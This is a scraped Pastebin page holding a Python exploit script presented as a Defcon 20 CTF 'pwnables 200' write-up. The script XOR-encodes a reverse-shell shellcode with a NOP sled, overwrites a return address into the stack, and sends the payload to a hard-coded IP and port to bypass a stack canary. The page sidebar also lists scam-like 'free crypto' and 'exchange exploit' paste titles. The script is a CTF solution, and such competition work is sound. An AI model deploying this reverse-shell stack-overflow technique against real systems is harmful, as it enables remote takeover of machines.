CARVIEW |
Select Language
HTTP/2 200
date: Sat, 11 Oct 2025 06:56:32 GMT
content-type: text/html; charset=UTF-8
server: cloudflare
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
vary: accept-encoding
cf-cache-status: DYNAMIC
content-encoding: gzip
set-cookie: _csrf-frontend=5a2688c0b77d5608c9a4b2b3356e665844542a2e8d3fddb33e0dfc5a27d71687a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22wpHtaQ0YOUq1kM0joAfyoFevLHkAkqKz%22%3B%7D; HttpOnly; Path=/
cf-ray: 98cc754ae8fbc1f7-BLR
#!/bin/python# exploit write up - pwnables 200 Defcon 20 CTF# by @_g05u_ N - Pastebin.com
SHARE
TWEET

Untitled
a guest
Jun 3rd, 2012
4,684
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/python
- # exploit write up - pwnables 200 Defcon 20 CTF
- # by @_g05u_ NULL Life FTW!
- import socket, struct
- #jump to shellcode in stack
- ret = struct.pack("<I", 0xbfbee2ac)
- #reverse shell 6969 https://www.shell-storm.org/shellcode/files/shellcode-676.php
- shellcode = "\x31\xc9\x51\x41\x51\x41\x51\x51\x31\xc0\xb0\x61\xcd\x80\x89\x07\x31\xc9\x88\x4f\x04\xc6\x47\x05\x02\xc7\x47\x08\xbe\xe8\xf5\x09\x66\xc7\x47\x06\x1b\x39\x6a\x10\x8d\x47\x04\x50\x8b\x07\x50\x50\x31\xc0\xb0\x62\xcd\x80\x31\xc9\x51\x8b\x07\x50\x50\x31\xc0\xb0\x5a\xcd\x80\x41\x83\xf9\x03\x75\xef\x31\xc9\x51\x51\x31\xc0\xb0\x17\xcd\x80\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
- shellcode = "\x90" * (512 - len(shellcode) - 100) + shellcode + "\x90" * 100
- shellcode = map(lambda x:(ord(x) ^ 0x42), shellcode)
- shell_encoded = ''
- for s in shellcode:
- shell_encoded += chr(s)
- ret = map(lambda x:(ord(x) ^ 0x42), ret)
- ret_encoded = ''
- for s in ret:
- ret_encoded += chr(s)
- s = socket.socket()
- s.connect(("140.197.217.155", 8912))
- s.send("b74b9d86e6cd3480\n")
- print s.recv(1024)
- s.send("4200A642\n") #decoded shellcode with xor 0x42
- print s.recv(1024)
- #bypass canarie number in binary
- s.send(shell_encoded + "\x4D" + ret_encoded)
Advertisement
Add Comment
Please, Sign In to add comment
-
⭐⭐Exchange Exploit⭐⭐ T
JavaScript | 2 sec ago | 0.24 KB
-
⭐⭐⭐Exchange Exploit T 3⭐⭐
Java | 5 sec ago | 0.10 KB
-
⭐ Instant BTC Profit Method ✅ NEVER SEEN BEFO...
JavaScript | 7 sec ago | 0.24 KB
-
⭐⭐⭐Instant Profit Method⭐⭐
Java | 18 sec ago | 0.10 KB
-
⭐✅ MAKE $2000 INSTANTLY ✅ NEVER SEEN BEFORE ⭐...
JavaScript | 22 sec ago | 0.24 KB
-
Free Crypto Method (NEVER SEEN BEFORE)⭐⭐ C
JavaScript | 27 sec ago | 0.24 KB
-
⭐ Free Crypto Method ✅ NEVER SEEN BEFORE ⭐⭐⭐
JavaScript | 31 sec ago | 0.24 KB
-
⭐⭐⭐Free Giftcards Method⭐⭐
Java | 31 sec ago | 0.10 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand